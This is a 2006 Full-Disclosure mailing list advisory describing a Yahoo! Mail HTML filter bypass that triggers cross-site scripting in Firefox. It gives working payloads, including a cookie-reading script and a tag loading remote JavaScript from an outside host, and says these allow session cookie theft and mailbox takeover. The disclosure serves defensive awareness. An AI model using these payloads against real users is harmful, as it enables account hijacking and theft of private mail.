Full Disclosure mailing list archives
Yahoo! Mail + Firefox Filter Bypass
From: simo () morx org
Date: Thu, 27 Jul 2006 03:06:09 -0000 (GMT)
Title: Yahoo! Mail Filter Bypass Author: Simo Ben youssef aka _6mO_HaCk <simo_at_morx_org> Discovered: january 2006 published: 26 july 2006 MorX Security Research Team http://www.morx.org http://www.morx.org/yahoo-firefox-bypass.txt Service: Webmail Vendor: Yahoo mail, and possibly others Vulnerability: Filter bypass / Cross Site Scripting Severity: Medium/High Tested to be vulnerable on: FireFox 1.5.0.4 not vulnerable: Microsoft IE 6.0, Opera 8.54 Details: few months ago i have published a vulnerability affecting Yahoo mail with MS IE, where yahoo mail filter failed to detect script attributes in combination with the style attribute as a tag, the combination code was: <STYLE onload="alert(document.cookie)"> </STYLE> few days later yahoo patched the above combination so now if you try to send your self that code, you will see that yahoo filters it this way <style onfiltered="alert(document.cookie)"> </style> this is not a good way of filtering, since yahoo filtered only the "onload" attribute few days later i received some emails asking how a similar bypass-combination can be executed on other browsers such as firefox since that one worked only on IE, after making some tests i realised that firefox will execute any js code proceeded by <style as a tag example: <style <script>alert('a')</script> or <style <body onload="alert('a')"> note that <style must be left open, if you close it with </style> firefox wont execute the js code in fact the first combination will not be filtered by yahoo mail, usualy yahoo filters <script> and </script> but if proceeded by the <style tag it wont be filtered at all which will lead to script execution on firefox and leads to user account compromise exploit code example <style <script>alert(document.cookie)</script> <style <script SRC=http://www.morx.org/xss.js></script> as you can see here from my yahoo mail message source code, the code is left unfiltered: <div id=message> <!-- type = text --> <style <script SRC=http://www.morx.org/xss.js></script><BR> Impact: an attacker can send the unfiltered code as an html email to a yahoo mail user with FireFox. Once the victim opens the malicious email the javascript content will be executed in the the target browser. This will allow user's session cookie theft, giving the attacker access to the victim mail box for about 24 hours (until the cookie expires) Screen captures: www.morx.org/yahoo-firefox-bypass.jpg workaround: Switch to another browser, or disable script execution until a patch is released Disclaimer: this entire document is for eductional, testing and demonstrating purpose only. Modification use and/or publishing this information is entirely on your OWN risk. The exploit code is to be used on your OWN email account. I cannot be held responsible for any of the above. comments or additional questions feel free to email me at simo_at_morx_org _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Yahoo! Mail + Firefox Filter Bypass simo (Jul 26)